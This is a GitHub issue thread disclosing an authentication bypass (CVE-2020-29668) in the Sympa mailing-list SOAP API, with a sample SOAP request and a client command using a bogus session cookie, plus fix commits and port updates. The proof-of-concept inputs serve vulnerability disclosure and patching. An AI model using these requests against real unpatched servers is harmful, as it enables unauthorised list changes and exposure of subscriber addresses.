Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[CVE-2020-29668] Unauthorised full access via SOAP API due to illegal cookie #1041

Closed
balert opened this issue Nov 24, 2020 · 5 comments · Fixed by #1044
Closed

[CVE-2020-29668] Unauthorised full access via SOAP API due to illegal cookie #1041

balert opened this issue Nov 24, 2020 · 5 comments · Fixed by #1044
Labels
bug security
Milestone
6.2.60

Comments

@balert
Copy link

balert commented Nov 24, 2020

Version

v6.2.56-1.el7 on Centos 7.8.2003

Installation method

Centos package

Expected behavior

permission denied

Actual behavior

error message and action actually executed anyways.

Additional information

In our setup we have a problem with incorrect cookies via the SOAP API of sympa.
If the SOAP request contains a correct cookie everything works as expected -> request executed
If the SOAP request contains a correct but outdated cookie, everything works as expected -> request correctly denied.

If the SOAP request contains an arbitrary string as cookie (e.g. "asdkjasdljkahsdlkjh"), SOAP replies with an error ("Undefined session ID in cookie") but STILL executes every requests we make. By this we can add email adresses to lists without authentication, any operation we tried was still successful.

We could hotfix the problem by inserting a die(); command into /usr/share/sympa/lib/Sympa/WWW/Session.pm:129 like this:

    my $session_id = _cookie2id($cookie);
    unless ($session_id) {
        $log->syslog('info', 'Undefined session ID in cookie "%s"', $cookie);
        die('nothing');
        return undef;
    }
@ikedas
Copy link
Member

ikedas commented Nov 25, 2020

Hi @balert , could you please show what you did, such as detailed commands you executed?

@ikedas ikedas added the bug label Nov 25, 2020
@balert
Copy link
Author

balert commented Nov 26, 2020

we sent a SOAP request like this:

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:sympasoap" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:authenticateAndRun soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <email xsi:type="xsd:string">mail@example.org</email>
         <cookie xsi:type="xsd:string">randomstring</cookie>
         <service xsi:type="xsd:string">review</service>
         <parameters xsi:type="wsdl:ArrayOfString" soapenc:arrayType="xsd:string[]" xmlns:wsdl="https://lists.example.org/sympa/wsdl">
         		<item>list@example.org</item>>
         </parameters>
      </urn:authenticateAndRun>
   </soapenv:Body>
</soapenv:Envelope>

@racke racke added the security label Nov 26, 2020
@racke
Copy link
Contributor

racke commented Nov 26, 2020

If that is true it would be a big hole. I'm going to try to reproduce it.

@racke
Copy link
Contributor

racke commented Nov 27, 2020
edited
Loading

I can confirm the problem. You need to know the listname and the email that is allowed to see the subscribers (e.g. the owner of the list.

Reproduce that with the client test script:


 /usr/local/sympa/bin/sympa_soap_client.pl
    --soap_url=https://lists.example.com/sympasoap
    --service=review
    --service_parameters=demo-list
    --user_email=demo@cart.pm
    --session_id=nevairbe

racke added a commit to racke/sympa that referenced this issue Nov 27, 2020
@racke
Properly check email and session id in authenticateAndRun SOAP call (s…
52157b5 
…ympa-community#1041).
@racke racke mentioned this issue Nov 27, 2020
Merged
@ikedas ikedas added the ready A PR is waiting to be merged. Close to be solved label Dec 1, 2020
@ikedas ikedas added this to the 6.2.60 milestone Dec 1, 2020
ikedas added a commit that referenced this issue Dec 7, 2020
@ikedas
Merge pull request #1044 from racke/pr/soap-api-access-fix by racke
4dacc82 
Properly check email and session id in authenticateAndRun SOAP call (#1041)
@carnil
Copy link

carnil commented Dec 10, 2020

This issue has been assigned CVE-2020-29668.

@ikedas ikedas changed the title Unauthorised full access via SOAP API due to illegal cookie [CVE-2020-29668Unauthorised full access via SOAP API due to illegal cookie Dec 11, 2020
@ikedas ikedas changed the title [CVE-2020-29668Unauthorised full access via SOAP API due to illegal cookie [CVE-2020-29668] Unauthorised full access via SOAP API due to illegal cookie Dec 11, 2020
@ikedas ikedas pinned this issue Dec 12, 2020
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue Jan 6, 2021
mail/sympa: update 6.2.58 -> 6.2.60, security update CVE-2020-29668
3ade5e0 
- fix SOAP interface vulnerability
  sympa-community/sympa#1041

PR:		252464
Submitted by:	geoffroy desvernay <dgeo@centrale-marseille.fr> (maintainer)
MFH:		2021Q1
Relnotes:	https://github.com/sympa-community/sympa/releases/tag/6.2.60
Security:	CVE-2020-29668


git-svn-id: svn+ssh://svn.freebsd.org/ports/head@560539 35697150-7ecd-e111-bb59-0022644237b5
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue Jan 6, 2021
@opsec
MFH: r560539
433cc3e 
mail/sympa: update 6.2.58 -> 6.2.60, security update CVE-2020-29668

- fix SOAP interface vulnerability
  sympa-community/sympa#1041

PR:		252464
Submitted by:	geoffroy desvernay <dgeo@centrale-marseille.fr> (maintainer)
Relnotes:	https://github.com/sympa-community/sympa/releases/tag/6.2.60
Security:	CVE-2020-29668
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue Jan 6, 2021
@opsec
mail/sympa: update 6.2.58 -> 6.2.60, security update CVE-2020-29668
06ea1ee 
- fix SOAP interface vulnerability
  sympa-community/sympa#1041

PR:		252464
Submitted by:	geoffroy desvernay <dgeo@centrale-marseille.fr> (maintainer)
MFH:		2021Q1
Relnotes:	https://github.com/sympa-community/sympa/releases/tag/6.2.60
Security:	CVE-2020-29668
Jehops pushed a commit to Jehops/freebsd-ports-legacy that referenced this issue Jan 6, 2021
@opsec
mail/sympa: update 6.2.58 -> 6.2.60, security update CVE-2020-29668
0b28ebf 
- fix SOAP interface vulnerability
  sympa-community/sympa#1041

PR:		252464
Submitted by:	geoffroy desvernay <dgeo@centrale-marseille.fr> (maintainer)
MFH:		2021Q1
Relnotes:	https://github.com/sympa-community/sympa/releases/tag/6.2.60
Security:	CVE-2020-29668


git-svn-id: svn+ssh://svn.freebsd.org/ports/head@560539 35697150-7ecd-e111-bb59-0022644237b5
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue Apr 1, 2021
@opsec
MFH: r560539
b4c2913 
mail/sympa: update 6.2.58 -> 6.2.60, security update CVE-2020-29668

- fix SOAP interface vulnerability
  sympa-community/sympa#1041

PR:		252464
Submitted by:	geoffroy desvernay <dgeo@centrale-marseille.fr> (maintainer)
Relnotes:	https://github.com/sympa-community/sympa/releases/tag/6.2.60
Security:	CVE-2020-29668
@ikedas ikedas unpinned this issue Apr 19, 2021
@ikedas ikedas removed the ready A PR is waiting to be merged. Close to be solved label Jul 6, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug security
Projects
None yet
Milestone
6.2.60
Development

Successfully merging a pull request may close this issue.

Properly check email and session id in authenticateAndRun SOAP call (#1041) racke/sympa
4 participants
@racke @carnil @balert @ikedas